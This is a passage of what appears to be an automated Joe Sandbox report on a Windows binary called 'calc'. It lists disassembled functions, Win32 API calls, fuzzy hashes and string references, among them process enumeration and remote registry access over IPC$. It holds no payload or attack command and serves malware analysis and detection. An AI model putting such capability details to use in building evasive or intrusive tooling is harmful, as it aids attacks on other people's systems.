Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 518dddbba622dd82d7c493602ea365595f60099f1130438587eb39e9325378c9
Instruction ID: 311043bbe2a0cac2703a3cba35c520e36c28c6709c8c22dbd14506481d928203
Opcode Fuzzy Hash: 518dddbba622dd82d7c493602ea365595f60099f1130438587eb39e9325378c9
Instruction Fuzzy Hash: 18614C71A0061AFFDB019FAADD44AAEBBB9FF08305F004525E500B26A1D735ED65CF98

Function 004404F4 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 400COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,00000003), ref: 00440567

Strings

FINDITEM, xrefs: 0044090B
SELECTALL, xrefs: 00440724
GETSELECTEDCOUNT, xrefs: 00440681
SELECTCLEAR, xrefs: 00440766
GETITEMCOUNT, xrefs: 0044058D
SELECTINVERT, xrefs: 004407FC
DESELECT, xrefs: 00440838
SELECT, xrefs: 00440798
GETSELECTED, xrefs: 0044089E
VIEWCHANGE, xrefs: 0044097A
GETTEXT, xrefs: 00440605
GETSUBITEMCOUNT, xrefs: 004405C9
ISSELECTED, xrefs: 004406BD

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3964851224-719923060
Opcode ID: 361a3ca69b3397bcbd0af91930995ec628a7fb33d946420f52438878d1894f0c
Instruction ID: 91dec06f46bf67a56ffbca69d406a93361d98d2bcf5d6cb5d48021af8806dc55
Opcode Fuzzy Hash: 361a3ca69b3397bcbd0af91930995ec628a7fb33d946420f52438878d1894f0c
Instruction Fuzzy Hash: 77F1A135904204ABEF10EF51C881ADD77B0AF04324F15809BE9157B297CB7CEE95DB99

Function 0040370F Relevance: 24.8, APIs: 6, Strings: 8, Instructions: 297COMMON

Download Yara Rule

Strings

TITLE, xrefs: 004039B7
HANDLE, xrefs: 00403863
CLASS, xrefs: 00403904
ACTIVE, xrefs: 00403822
ALL, xrefs: 00403983
INSTANCE, xrefs: 00403943
LAST, xrefs: 004037CF
REGEXPTITLE, xrefs: 004038B1

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID:
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPTITLE$TITLE
API String ID: 0-1002644998
Opcode ID: b775c76aaabb7ba7156cb814bf6caf9c6bccd3d2c61fbd903a8bcc880dd4e17f
Instruction ID: f31cf381076a0f888e4b9b29ebd17d05e6bef760160a7657eb3a5a9d70ff2295
Opcode Fuzzy Hash: b775c76aaabb7ba7156cb814bf6caf9c6bccd3d2c61fbd903a8bcc880dd4e17f
Instruction Fuzzy Hash: 0FC17E71A042559EDF11EF65C8847AA7FA8AF08309F0541ABFC04BB287C77CD949CB69

Function 00412E32 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 208windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000007,?,00000000,0000002C), ref: 00412EEC
GetMenuItemCount.USER32(0047A6A8), ref: 00412F7B
DeleteMenu.USER32(0047A6A8,00000005,00000000,0047A6A8,?,00000000), ref: 00413012
DeleteMenu.USER32(0047A6A8,00000004,00000000,?,00000000), ref: 00413019
DeleteMenu.USER32(0047A6A8,00000006,00000000,?,00000000), ref: 00413020
DeleteMenu.USER32(0047A6A8,00000003,00000000,?,00000000), ref: 00413027
GetMenuItemCount.USER32(0047A6A8), ref: 0041302E
SetMenuItemInfoW.USER32(0047A6A8,00000004,00000000,0000002C), ref: 00413065
GetCursorPos.USER32(?), ref: 0041306F
SetForegroundWindow.USER32(?), ref: 00413078
TrackPopupMenuEx.USER32(0047A6A8,00000000,?,00000040,?,00000000,?,00000000), ref: 0041308B
PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00413097

Strings

@, xrefs: 00412F40
,, xrefs: 00412E42

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
String ID: ,$@
API String ID: 1441871840-1227015840
Opcode ID: 6fba69342bae33aab1d83c18947fedfc591f4581130f52114987ab3926d0da51
Instruction ID: 4df3f0e84d8b0de06bb22b55110f503df572b040d89fde59fd7f95bd6219fecb
Opcode Fuzzy Hash: 6fba69342bae33aab1d83c18947fedfc591f4581130f52114987ab3926d0da51
Instruction Fuzzy Hash: 7671AE70501248BEEB21DF54CD84FDBBBF8EB05348F20441AF56592291C7B99E95EB28

Function 00408DC0 Relevance: 24.4, APIs: 16, Instructions: 435windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001308,?,00000000), ref: 00408E5F
6FB00200.COMCTL32(?,?,?,?,?), ref: 00408E8F
DeleteObject.GDI32(?), ref: 004092CE
DeleteObject.GDI32(?), ref: 004092D8

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: DeleteObject$B00200MessageSend
String ID:
API String ID: 2462660603-0
Opcode ID: 681bfac6f9b775f46c0de513788c86c80d53ef1ddb92152cbeed067875cecc96
Instruction ID: 7d2debd5b4728ea3e7bc78dbc7d3a0c9875d6f4225f609ec850b9899efb3e1eb
Opcode Fuzzy Hash: 681bfac6f9b775f46c0de513788c86c80d53ef1ddb92152cbeed067875cecc96
Instruction Fuzzy Hash: 4CF1BE30600606EFDB21DF64C984AAAB7F5BF05300F1406AEE555EB2E2C738ED90CB59

Function 00423E39 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 161COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,00000000), ref: 00423E8C
GetDriveTypeW.KERNEL32(?,open,close), ref: 00423F02
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00423F73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00423FA6
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00423FC9

Strings

closed, xrefs: 00423EB6, 00423EBD, 00423EE5
close cd wait, xrefs: 00423FB5
type cdaudio alias cd wait, xrefs: 00423F56
open , xrefs: 00423F3E
close, xrefs: 00423E92
open, xrefs: 00423EC7
wait, xrefs: 00423F91
set cd door , xrefs: 00423F79

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1600147383-4113822522
Opcode ID: e798e5cba57f05c642975c2479575c6facbe9a9e44185d1778da3dbd510af00b
Instruction ID: d880ffdb118256abe20f09d514c1cc5d447d9422aaf319f78db7854ebfdf8fa5
Opcode Fuzzy Hash: e798e5cba57f05c642975c2479575c6facbe9a9e44185d1778da3dbd510af00b
Instruction Fuzzy Hash: 4351E831A002296ADF10AF65EC41AEF7779AF00725F52451BF811771A1CB7CEE858798

Function 00418B39 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 399timeCOMMON

Download Yara Rule

APIs

Part of subcall function 004183F6: VariantClear.OLEAUT32(?), ref: 00418410

VariantCopy.OLEAUT32(00000000,00431D12), ref: 00418B96
VariantClear.OLEAUT32(00000000), ref: 00418BA6
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00418C34
VarR4FromDec.OLEAUT32(?,00431D12), ref: 00418C8E
VariantInit.OLEAUT32(00000000), ref: 00418E76
VariantCopy.OLEAUT32(00000000,00431D12), ref: 00418E7F
VariantClear.OLEAUT32(00000000), ref: 00418E8F
SafeArrayAccessData.OLEAUT32(F006748D,00000000), ref: 00418EAA
SafeArrayAccessData.OLEAUT32(F006748D,?), ref: 00418F24
SafeArrayAccessData.OLEAUT32(F006748D,?), ref: 00418F92
SafeArrayUnaccessData.OLEAUT32(F006748D), ref: 00418FF4

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00418C5B

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Variant$ArrayDataSafe$AccessClear$CopyTime$FromInitSystemUnaccess
String ID: %4d%02d%02d%02d%02d%02d
API String ID: 3089604418-1568723262
Opcode ID: cfc0fc8603459c0ecd67d867233e7278f9da470c659dcba5a5f405ed2ac1eb65
Instruction ID: f61b0e39ba79fa92f8e0144b1a52bb32301d3f9e329304e71c291f811c95cde8
Opcode Fuzzy Hash: cfc0fc8603459c0ecd67d867233e7278f9da470c659dcba5a5f405ed2ac1eb65
Instruction Fuzzy Hash: D7E1AB71600615EFDB10CF69C884BAAB7B4FF09305F1484AEE505DB2A1DB78EC82DB59

Function 00414777 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 004163E7: LoadLibraryA.KERNEL32(Psapi.dll,004147A2,00000000,75730F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,02340F90,00479E08), ref: 004163F2
Part of subcall function 004163E7: GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00416404

FreeLibrary.KERNEL32(00000000,00000000,75730F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,02340F90,00479E08), ref: 00414969

Part of subcall function 0041640E: LoadLibraryA.KERNEL32(Psapi.dll,004147B9,00000000,75730F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,02340F90,00479E08), ref: 00416419
Part of subcall function 0041640E: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0041642B

FreeLibrary.KERNEL32(00000000,00000000,75730F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,02340F90,00479E08), ref: 0041495E

Part of subcall function 00416435: LoadLibraryA.KERNEL32(Psapi.dll,004147CB,00000000,75730F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,02340F90,00479E08), ref: 00416440
Part of subcall function 00416435: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00416452

FreeLibrary.KERNEL32(00479E08,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,02340F90,00479E08), ref: 004147FE
FreeLibrary.KERNEL32(00000000,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,02340F90,00479E08), ref: 00414809
FreeLibrary.KERNEL32(00000000,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,02340F90,00479E08), ref: 00414818
OpenProcess.KERNEL32(00000410,00000000,?,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,02340F90,00479E08), ref: 0041485C
CloseHandle.KERNEL32(00420411,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,02340F90,00479E08), ref: 0041490F
FreeLibrary.KERNEL32(00479E08,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,02340F90,00479E08), ref: 00414931
FreeLibrary.KERNEL32(0042018E,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,02340F90,00479E08), ref: 0041493B
FreeLibrary.KERNEL32(00000000,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,02340F90,00479E08), ref: 00414945
FreeLibrary.KERNEL32(00479E08,00000000,75730F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,02340F90,00479E08), ref: 00414953

Strings

su, xrefs: 00414921

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Library$Free$AddressLoadProc$CloseHandleOpenProcess
String ID: su
API String ID: 3454388078-45427494
Opcode ID: c4f79a643b5682921c722641b7f80092ca5cfa9fb87e33459252109ddd29e822
Instruction ID: 67da03c55051d6841422090956ccbf622c4eb7ad81aeaa5aa04e5421710b268f
Opcode Fuzzy Hash: c4f79a643b5682921c722641b7f80092ca5cfa9fb87e33459252109ddd29e822
Instruction Fuzzy Hash: 765129B1C1022DEBDF12ABA5DC40AEFBBB8BF88315F140167E510B2150D7789A85DF98

Function 00430763 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 138registryshareCOMMON

Download Yara Rule

APIs

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00430838
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00430853
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00430873
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0043089D
CLSIDFromString.COMBASE(00000000,?), ref: 004308CA
RegCloseKey.ADVAPI32(?), ref: 004308DC
RegCloseKey.ADVAPI32(?), ref: 004308E1

Strings

\IPC$, xrefs: 00430818
\CLSID, xrefs: 004307AF
SOFTWARE\Classes\, xrefs: 00430791
\, xrefs: 004307D0
\, xrefs: 004307D6

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
String ID: SOFTWARE\Classes\$\$\$\CLSID$\IPC$
API String ID: 3030280669-2678712113
Opcode ID: 453c8cb8aaa4de0b09c011fe067ad409552cfb1233d0248a75fe623b2e3561b7
Instruction ID: e9f791e3af91f90d151af441e719dbce76ac587e37e4bc486b3c1f566675ae6e
Opcode Fuzzy Hash: 453c8cb8aaa4de0b09c011fe067ad409552cfb1233d0248a75fe623b2e3561b7
Instruction Fuzzy Hash: E5418271900218ABCF21EFE5DC86DEEBBB9EF08754F100166F901A3151DB399E85CB98

Function 0040ADFC Relevance: 21.1, APIs: 14, Instructions: 123filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407B99,?,?,?), ref: 0040AE1F
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00407B99,?,?,?,?,?), ref: 0040AE2E
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,00407B99,?,?,?,?,?), ref: 0040AE3A
GlobalLock.KERNEL32(00000000), ref: 0040AE43
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00407B99,?,?,?,?,?), ref: 0040AE53
GlobalUnlock.KERNEL32(00000000), ref: 0040AE5A
CloseHandle.KERNEL32(00000000,?,?,?,00407B99,?,?,?,?,?), ref: 0040AE61
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0040AE6E
OleLoadPicture.OLEAUT32(?,00000000,00000000,0045AEA8,?), ref: 0040AE82
GlobalFree.KERNEL32(00000000), ref: 0040AE92
GetObjectW.GDI32(?,00000018,?), ref: 0040AEB9
CopyImage.USER32(?,00000000,?,?,00002000), ref: 0040AEF0
DeleteObject.GDI32(?), ref: 0040AF12
SendMessageW.USER32(?,00000172,00000000,?), ref: 0040AF28

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3969911579-0
Opcode ID: 49c49731e839cb7fe105a19153864ee00061c65c46ae88794a82da1298d8b0f8
Instruction ID: cb8fd9a0ce4e2b5bf979152b6b69ba6d5677fcb9638b9655bdc767c6ac9b755b
Opcode Fuzzy Hash: 49c49731e839cb7fe105a19153864ee00061c65c46ae88794a82da1298d8b0f8
Instruction Fuzzy Hash: C3413475900319FFCB119FA0CC88DAEBBB9EF89312B2044A5F505E72A1D7359D02CBA4

Function 00455EDD Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 90libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,0045BFD0,?,?), ref: 00455EF5
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00455F11
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00455F22
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00455F2F
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00455F45
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00455F56

Strings

GetProcessWindowStation, xrefs: 00455F50
GetLastActivePopup, xrefs: 00455F24
MessageBoxA, xrefs: 00455F0B
GetUserObjectInformationA, xrefs: 00455F3F
GetActiveWindow, xrefs: 00455F1C
user32.dll, xrefs: 00455EF0

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
API String ID: 2238633743-1612076079
Opcode ID: 7611b16ea55112288e4e24d76ec937120c27eb8a9d56c1d51c026ca64dbdc89f
Instruction ID: 4e8962c2657cc3db2d1b492644d61bf7130a5013e907e64669c8747346af678d
Opcode Fuzzy Hash: 7611b16ea55112288e4e24d76ec937120c27eb8a9d56c1d51c026ca64dbdc89f
Instruction Fuzzy Hash: 0321C872205705AFEB109FB59C94E3B3BE89B05746B10043BED00D2152E7BCC84C9B6E

Function 0043936F Relevance: 19.9, APIs: 13, Instructions: 361COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00439448
CloseHandle.KERNEL32(?), ref: 0043951D
FreeLibrary.KERNEL32(?), ref: 0043953D
FreeLibrary.KERNEL32(?), ref: 00439547
FreeLibrary.KERNEL32(?,00000000), ref: 00439574

Part of subcall function 00416372: LoadLibraryA.KERNEL32(kernel32.dll,0041461F,75730F00,00479E08), ref: 0041637D
Part of subcall function 00416372: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0041638F

FreeLibrary.KERNEL32(?,00000000), ref: 0043957E
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 0043969F
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 004396B4
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 004396BF
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 004396CA
FreeLibrary.KERNEL32(?,00000000), ref: 004397CB
FreeLibrary.KERNEL32(?,00000000), ref: 004397D5

Part of subcall function 00416399: LoadLibraryA.KERNEL32(kernel32.dll,00414630,75730F00,00479E08), ref: 004163A4
Part of subcall function 00416399: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004163B6

Part of subcall function 004163C0: LoadLibraryA.KERNEL32(kernel32.dll,00414641,75730F00,00479E08), ref: 004163CB
Part of subcall function 004163C0: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004163DD

FreeLibrary.KERNEL32(?,00000000), ref: 004397DF

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Library$Free$AddressLoadProc$CloseHandle$OpenProcess
String ID:
API String ID: 2673135774-0
Opcode ID: 4b6be4e7d54f93fa4930be267a8433d1409893dadd987cea7e2096f976ecb1a7
Instruction ID: b58e278ce73e61c3bd0addc224ce89628fbce7a2dc744801581c9458643eb4d8
Opcode Fuzzy Hash: 4b6be4e7d54f93fa4930be267a8433d1409893dadd987cea7e2096f976ecb1a7
Instruction Fuzzy Hash: BAD1D872D00219EBDF11EFA5CC819DEB7B8AF08304F1540ABE905B7151DB78AE858B99

Function 0042AD12 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 278COMMON

Download Yara Rule

APIs

Part of subcall function 0042FEC4: LoadLibraryA.KERNEL32(Wininet.dll,0042FD60,00000000,0042AA4D,?,?,?,?,?,00000001,00000000,00000000,00000002,00000000,00000002,?), ref: 0042FECF
Part of subcall function 0042FEC4: GetProcAddress.KERNEL32(00000000,InternetConnectW), ref: 0042FEE1

FreeLibrary.KERNEL32(?,00000000,?,?,?,?,?,00000000,00000000), ref: 0042ADE8

